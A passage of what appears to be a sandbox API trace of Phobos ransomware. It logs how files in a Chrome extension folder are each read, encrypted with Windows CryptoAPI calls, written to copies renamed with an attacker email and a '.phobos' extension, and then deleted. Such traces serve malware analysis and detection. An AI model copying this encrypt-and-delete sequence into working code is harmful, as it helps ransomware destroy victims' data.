1 [0149.230] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0149.230] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.230] CloseHandle (hObject=0x134) returned 1 [0149.230] CloseHandle (hObject=0x188) returned 1 [0149.230] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json")) returned 1 [0149.231] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0149.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.231] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=264) returned 1 [0149.231] CloseHandle (hObject=0x188) returned 1 [0149.231] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json")) returned 0x2020 [0149.231] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.231] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.231] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.232] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0149.232] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.232] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x108, lpOverlapped=0x0) returned 1 [0149.233] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0149.233] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0149.233] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32e28) returned 1 [0149.234] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.234] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0149.234] CryptDestroyKey (hKey=0xa32e28) returned 1 [0149.234] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0149.234] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.234] CloseHandle (hObject=0x188) returned 1 [0149.234] CloseHandle (hObject=0x134) returned 1 [0149.234] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json")) returned 1 [0149.235] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0149.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.236] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=207) returned 1 [0149.236] CloseHandle (hObject=0x134) returned 1 [0149.236] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json")) returned 0x2020 [0149.236] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.236] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.236] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.236] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0149.236] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.236] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xcf, lpOverlapped=0x0) returned 1 [0149.238] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0, dwBufLen=0xd0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0) returned 1 [0149.238] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xd0, lpOverlapped=0x0) returned 1 [0149.238] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32e28) returned 1 [0149.238] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.238] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0149.238] CryptDestroyKey (hKey=0xa32e28) returned 1 [0149.239] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0149.239] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.239] CloseHandle (hObject=0x134) returned 1 [0149.239] CloseHandle (hObject=0x188) returned 1 [0149.239] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json")) returned 1 [0149.240] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0149.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.240] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=222) returned 1 [0149.240] CloseHandle (hObject=0x188) returned 1 [0149.240] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json")) returned 0x2020 [0149.240] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.240] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.240] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.241] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0149.241] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.241] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xde, lpOverlapped=0x0) returned 1 [0149.242] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0149.242] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0149.242] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32e28) returned 1 [0149.242] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.243] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0149.243] CryptDestroyKey (hKey=0xa32e28) returned 1 [0149.243] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0149.243] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.243] CloseHandle (hObject=0x188) returned 1 [0149.243] CloseHandle (hObject=0x134) returned 1 [0149.243] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json")) returned 1 [0149.244] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0149.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.244] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=216) returned 1 [0149.244] CloseHandle (hObject=0x134) returned 1 [0149.244] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json")) returned 0x2020 [0149.244] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.244] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.245] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.245] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0149.245] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.245] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd8, lpOverlapped=0x0) returned 1 [0149.246] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0149.246] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0149.247] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32e28) returned 1 [0149.247] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.247] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0149.247] CryptDestroyKey (hKey=0xa32e28) returned 1 [0149.247] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0149.247] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.247] CloseHandle (hObject=0x134) returned 1 [0149.247] CloseHandle (hObject=0x188) returned 1 [0149.247] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json")) returned 1 [0149.248] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0149.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.248] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=217) returned 1 [0149.248] CloseHandle (hObject=0x188) returned 1 [0149.248] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json")) returned 0x2020 [0149.248] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 